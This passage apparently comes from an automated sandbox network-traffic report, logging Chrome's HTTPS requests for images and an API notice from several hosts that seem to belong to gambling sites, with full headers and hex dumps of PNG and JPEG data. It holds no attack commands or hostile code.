                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC3392INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 32 62 79 2b 37 76 74 61 62 61 61 32 4f 42 52 4b 72 41 52 39 6c 69 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 67 54 37 77 50 59 4c 4e 74 56 34 2f 39 46 42 6f 7a 63 41 78 36 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4b 6f 64 4e 6f 48 6c 6b 47 50 47 4e 53 35 54 30 6a 46 4d 53 42
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g2by+7vtabaa2OBRKrAR9liZMmMF0oh762Gd0BApJfRrgT7wPYLNtV4/9FBozcAx6syoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramKodNoHlkGPGNS5T0jFMSB


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          574192.168.2.55035290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC381OUTGET /pc/image-pc/footer/new/footer_gray_01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40722
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jun 2022 08:13:12 GMT
                                                                                                                                                          ETag: "62a05a18-9f12"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[2],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE12[3],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465105
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ecb62628bdac53dfcfb0caa9eebd4b4a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 c3 00 00 00 2d 08 06 00 00 00 8a d3 b9 59 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c0 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 2c 20 32 30 32 31 2f 31 32 2f 30 38 2d 31 39 3a 31 31 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52
                                                                                                                                                          Data Ascii: PNGIHDR-YpHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:R
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 86 86 85 85 2d 35 99 4c 82 aa aa 57 c4 f8 bf f0 c2 0b 6e 00 68 b7 7e fd fa c7 4c 26 d3 bb 11 11 11 9d 4d 26 53 e9 c6 8d 1b 57 f5 ed db 77 64 9f 3e 7d de dd b8 71 e3 f3 b1 b1 b1 7d 43 42 42 1a 06 b8 37 22 83 c1 50 a7 6f df be 9f af 5f bf 3e 4d 96 e5 5d 7a 03 cf f3 42 61 61 e1 91 be 7d fb 76 db ba 75 eb e9 c8 c8 48 7f 2c 9d 28 8a 5d 78 9e e7 75 39 65 65 65 b6 17 5e 78 a1 74 c3 86 0d 83 c2 c3 c3 a7 ea b1 8c 85 85 85 e7 7a f4 e8 d1 0e 00 60 ff fe fd 19 fa 6f cd e7 e9 d4 41 14 c5 93 01 65 69 90 c9 64 7a a9 6f df be 6f 6f de bc f9 db e8 e8 e8 fb 01 00 64 59 fe c6 62 b1 4c 96 65 19 9c 4e e7 37 fa 1a 36 6c d8 30 31 32 32 32 4d 55 55 96 97 97 d7 73 c0 80 01 ef 01 00 d4 ab 57 8f 53 55 15 2b 8a 02 18 e3 b4 c8 c8 c8 78 97 cb 45 f3 f3 f3 1f 1f 30 60 c0 e7 be f9 07 05
                                                                                                                                                          Data Ascii: -5LWnh~L&M&SWwd>}q}CBB7"Po_>M]zBaa}vuH,(]xu9eee^xtz`oAeidzooodYbLeN76l01222MUUsWSU+xE0`
                                                                                                                                                          2024-06-09 22:41:20 UTC8571INData Raw: fa 21 8a 22 35 18 0c 85 00 50 02 00 c1 8a a2 44 07 d6 fa d5 fb 98 4c a6 6e fd fb f7 ff b0 f2 e4 55 11 62 84 10 18 8d 46 85 e7 f9 42 00 d0 08 21 e1 1e 8f c7 52 39 0e c5 6a b5 16 7e fe f9 e7 b1 95 c9 f8 f2 e5 cb a9 4e c4 39 8e 83 91 23 47 de 30 a1 cd ce ce fe c4 66 b3 b5 d7 8f 6f 31 19 9e 8a 10 ca 88 8c 8c 84 67 9e 79 c6 5f 3e 67 d7 ae 5d 90 97 f7 d7 c3 72 3b 76 ec 08 8b 17 df 5a c5 3d cf f3 da 9a 35 6b ae 5b ba a0 32 ae 47 86 a7 4d 9b b6 3e 2d 2d ad 7f 55 6d 49 49 49 32 42 48 d4 4b d5 f8 ea 4b 76 ce c8 c8 d8 97 9c 9c ec e2 38 ce 74 23 b1 e1 9a a6 a9 82 20 0c 4a 4e 4e de 08 50 ae 05 62 8c fd 22 08 42 f0 f5 c6 02 94 d7 1c 45 08 fd 27 35 35 75 f8 8d f4 ff a7 18 39 72 e4 d6 d2 d2 d2 e7 03 c9 69 20 74 92 5b d9 2d 38 30 a6 58 27 cb 3a f4 bf 43 60 e9 a4 40 79 81
                                                                                                                                                          Data Ascii: !"5PDLnUbFB!R9j~N9#G0fo1gy_>g]r;vZ=5k[2GM>--UmIII2BHKKv8t# JNNPb"BE'55u9ri t[-80X':C`@y


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          575192.168.2.55035190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC371OUTGET /pc/image-pc/index/382/10100.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 59933
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 09:05:19 GMT
                                                                                                                                                          ETag: "64c0e1cf-ea1d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE4[4],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dc73b32b376571b8092915139fcf63c2
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                          Data Ascii: PNGIHDRXtEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 79 e7 62 ef fe 89 ed 56 2f f2 25 d2 10 f7 af 6c 24 d4 48 2a 00 84 17 80 22 a7 1f 71 5c 89 27 74 42 03 3d 8b f5 3c 9e 9c 56 6e fd 55 de 54 43 66 69 45 37 26 37 92 ba 2c 49 41 f7 d4 6a 24 6c 9f 03 7b 5c 3f f4 86 5e 98 1d cb 7d ab bf ee 21 7b 3b 2d 1e b7 9e ae c4 7a 77 2b ea eb 6b 91 ed 29 80 64 b5 12 ea 82 7a a8 fb df 46 77 73 2e 2c d9 bf 80 66 8e 16 7d dc 87 c0 db 53 a0 29 b0 29 6e 5d 9a c2 16 da b8 f4 58 6e f7 80 d9 e5 18 2f 51 81 a3 4e 70 b1 ac 10 3b f1 64 a9 1b 07 6a 1a 90 fb e5 87 e0 64 0a 78 9d ce 10 e3 9a 13 01 23 20 80 3c 17 30 45 c2 b4 48 38 05 0b 2f 54 c7 0d 29 f1 d1 0d f4 88 c7 45 a2 73 61 c1 48 95 12 7d 0d 75 ae 2f 1a 5c 1f b2 2a c1 8d 5d ee 37 5e bc 7c c3 63 93 7f 36 0a a3 c7 ec 86 c3 43 bf ce cb a2 f4 5e c8 f8 7e 28 ad ad f0 9a 1d b0 f6 d3 80
                                                                                                                                                          Data Ascii: ybV/%l$H*"q\'tB=<VnUTCfiE7&7,IAj$l{\?^}!{;-zw+k)dzFws.,f}S))n]Xn/QNp;djdx# <0EH8/T)EsaH}u/\*]7^|c6C^~(
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: ca 39 57 cd 4b 11 4e 75 ea 68 69 15 50 46 b6 5c cb d8 a1 52 9d 33 ab 40 a6 8f 7c 36 52 0a 26 8a 47 50 53 e7 b5 72 0f 6c 66 59 2e 86 61 63 0e 22 33 96 11 f6 de 00 3e b1 95 6e b0 c4 8a 50 b0 8d cd 2c 81 d7 03 6d 64 1c be be 2e 9c df 54 8c a5 ad b5 50 b2 31 e4 b2 ca a9 65 2c a6 40 31 87 a8 84 79 cf 6c f4 15 3d 5c d2 8a 53 b3 1a ee 84 04 7f 4d 21 ca 8a 12 d8 bf 71 1d 2d e6 02 7a c0 08 ca 8b d8 88 67 9e fe 24 c1 f8 5c cd a6 20 36 61 d6 ea bc 65 a3 16 38 b9 83 e4 f1 04 9d bf cd 3e 8e d1 c3 b1 30 ea 28 2d 92 73 da 3b 62 3e 49 56 d7 53 9b 79 7e d1 e6 dd e9 e3 c7 7f df 86 1b 3e d5 08 b5 98 e0 d6 a6 6d 90 7e 21 c2 3b 53 84 9a 8e 20 b7 ee 51 93 27 b8 e2 c3 ff 82 b2 eb 1c 88 8e ec 84 b3 4d 46 bc 4c c2 9d 3d 2f d2 7d 94 42 f8 d7 4e 70 07 8e 81 6b a4 ab 38 c8 07 98 f0
                                                                                                                                                          Data Ascii: 9WKNuhiPF\R3@|6R&GPSrlfY.ac"3>nP,md.TP1e,@1yl=\SM!q-zg$\ 6ae8>0(-s;b>IVSy~>m~!;S Q'MFL=/}BNpk8
                                                                                                                                                          2024-06-09 22:41:20 UTC11397INData Raw: 51 a7 8f ea 96 9e 03 4b 2b 5d ab 5f 46 80 51 ce 36 56 c2 86 20 30 6c 86 f7 10 37 d1 bd 0c b9 10 6b 9b 41 53 40 87 e6 d6 f1 af cf 95 be b8 d8 30 54 c7 5b c3 3f dc 6f 66 a3 90 11 d2 13 6a 85 5b d9 1a 7a ae a0 a3 d2 cb 83 b5 d4 9b 1f 9b 47 03 23 d3 96 6a f8 ab c6 31 d5 bf 0f d1 03 2f 91 55 b9 98 5c e1 6d 04 44 49 61 f4 66 9c 72 3e c9 0c 9d 69 cf e6 04 56 12 ac 29 88 4e 4c ce cd 98 95 41 7c 6b cd 1c ea 57 dd 4d 3e 7a 77 92 ad 6e 59 09 93 b2 20 42 72 d5 92 15 62 85 13 ee c9 3d 88 1c da 83 ba b6 f7 22 58 f3 9f 58 98 5c 40 35 c1 95 4f af f4 c2 be b7 48 d8 dd 4c 88 62 bb d2 3c 6b 6e 4f 58 b8 fd 2c 56 9b 96 bc c8 54 10 d6 6e 33 9d 76 8e 5b 80 7b 69 16 d6 a9 3a 70 2c 9d 36 ac e2 be f1 85 ef 8f 41 37 70 fe 64 46 71 3c a6 4b 08 bb 78 84 ed 34 69 bc 95 0e de a8 6e c8
                                                                                                                                                          Data Ascii: QK+]_FQ6V 0l7kAS@0T[?ofj[zG#j1/U\mDIafr>iV)NLA|kWM>zwnY Brb="XX\@5OHLb<knOX,VTn3v[{i:p,6A7pdFq<Kx4in


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          576192.168.2.550328103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC385OUTGET /zb-cloud/pwv/sn.notice.new.layer.query HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:20 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:20 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 32 30 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          2024-06-09 22:41:20 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 30 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 0
                                                                                                                                                          2024-06-09 22:41:20 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:41:20 UTC32INData Raw: 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: access-control-allow-origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC82INData Raw: 78 2d 76 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: x-via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC17INData Raw: 76 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a
                                                                                                                                                          Data Ascii: via: 1.1 google
                                                                                                                                                          2024-06-09 22:41:20 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 73 67 31 2d 63 64 6e 62 31 33 34 2d 30 32 31 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: MISS from sg1-cdnb134-021
                                                                                                                                                          2024-06-09 22:41:20 UTC20INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 0d 0a
                                                                                                                                                          Data Ascii: Content-Length: 24
                                                                                                                                                          2024-06-09 22:41:20 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          577192.168.2.55034554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC643OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-4e3b"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 4609254837614843411
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:20 UTC3643INData Raw: 90 27 8d 37 71 75 48 aa 2a ae d7 20 f4 ee 08 3a b1 35 5e a2 1a a6 ec 8e df f0 d4 6b 95 61 6f 01 56 44 35 41 40 49 3a 8f 4f 4d 4b d8 e3 a4 94 87 75 3b 74 db b4 65 5d 15 64 5b 5a c6 c8 07 40 08 d3 25 b1 a3 a0 ce ef f7 75 a2 8a cf 01 49 5f 97 7d 74 51 01 5e ad 7d 34 94 40 52 83 f2 fc 34 26 9c 15 ed 0d 38 29 6b a0 34 ea d6 63 40 69 e5 14 a3 42 69 e1 4b a1 34 e8 a5 d2 51 51 8f d8 fc 65 be 57 96 65 a0 9f 1b fd 56 48 b8 ee 56 7b 1b 65 c5 c1 9a 94 5c 47 05 62 78 6c 2e 7f 4e 79 15 ba aa 31 15 3d 2b aa ee e4 e5 2d 82 0c 75 0e 25 70 9e 2c 31 02 a6 6c 54 33 9c 27 03 c3 57 d4 73 ae ad b1 e3 d7 d7 bf fa 3f 63 91 e3 19 9b 9b 07 bd 78 73 16 97 7e d7 e1 63 85 60 93 28 77 ad e0 f2 11 8d 46 42 49 68 83 55 7f 56 9b ba 6a 8d af 05 f3 48 61 31 84 5d 6f b3 c3 ed fb fd 95 6a 2d
                                                                                                                                                          Data Ascii: '7quH* :5^kaoVD5A@I:OMKu;te]d[Z@%uI_}tQ^}4@R4&8)k4c@iBiK4QQeWeVHV{e\Gbxl.Ny1=+-u%p,1lT3'Ws?cxs~c`(wFBIhUVjHa1]oj-


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          578192.168.2.55035690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC607OUTGET /pc/image-pc/index/312/nav/casino/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 40838
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:45 GMT
                                                                                                                                                          ETag: "5d71fe7d-9f86"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE25[3],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fdd1c2141b886f0d44e4b325793d2694
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126898
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 5c c7 71 e7 8d 7f ba 4f 98 3c 37 47 00 17 39 27 82 60 26 45 30 4a 24 95 ad 44 51 39 67 cb 69 1d 76 bd 96 5e 7b d7 f6 3a bf 56 ce 54 a6 a2 25 51 a2 98 41 82 04 03 88 40 22 e7 70 73 9e 3c 73 52 77 ff fe 38 73 01 50 92 25 51 94 bd fb fc f6 6d 3e c3 7b 71 9f 99 39 e7 74 57 57 55 57 7d eb 5b 82 ff cd 43 22 9f d7 e7 35 fa f9 df 44 72 29 57 be f5 9f bb 8b f9 15 07 46 2d bb d3 c6 d0 ef d7 2a dd
                                                                                                                                                          Data Ascii: PNGIHDRQjgAMAa cHRMz&u0`:pQ<bKGDCIDATxw\qO<7G9'`&E0J$DQ9giv^{:VT%QA@"ps<sRw8sP%Qm>{q9tWWUW}[C"5Dr)WF-*
